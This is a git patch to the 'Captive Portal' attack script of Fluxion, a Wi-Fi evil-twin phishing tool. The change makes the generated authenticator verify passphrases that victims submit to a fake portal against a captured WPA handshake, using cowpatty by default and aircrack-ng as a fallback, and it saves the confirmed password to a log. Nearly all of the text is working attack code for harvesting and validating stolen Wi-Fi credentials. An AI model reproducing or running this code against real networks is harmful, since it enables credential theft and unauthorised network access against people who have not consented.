From 09dfa6d461ff07235e6431bcecdebefe09564aae Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sun, 26 May 2019 21:39:18 -0500 Subject: [PATCH] Changed authenticator preferred verification program. Added logic to choose cowpatty over aircrack-ng when verifying keys. * This is due to the fact aircrack-ng kept giving false negatives on tests. --- attacks/Captive Portal/attack.sh | 46 +++++++++++++++++++++++--------- 1 file changed, 33 insertions(+), 13 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index dec1713..92f2d53 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -917,20 +917,37 @@ while [ \$AuthenticatorState = \"running\" ]; do " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" if [ $CaptivePortalAuthenticatorMode = "hash" ]; then - echo " - if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then - # Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\". - if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then - echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + # 05/26/19: Default to cowpatty for verification since aircrack-ng appears to have a bug. + if which cowpatty &> /dev/null; then + echo " + if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then + if cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> /dev/null; then + echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" - sleep 1 - break + sleep 1 + break - else - echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + else + echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" - fi - fi" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + fi + fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + else + echo " + if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then + # Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\". + if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then + echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + + sleep 1 + break + + else + echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" + + fi + fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + fi fi local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") @@ -1005,9 +1022,12 @@ IP: $(captive_portal_get_client_IP) \" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" if [ $CaptivePortalAuthenticatorMode = "hash" ]; then +# echo " +# aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ +#" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" echo " -aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ -" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ + " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi chmod +x "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"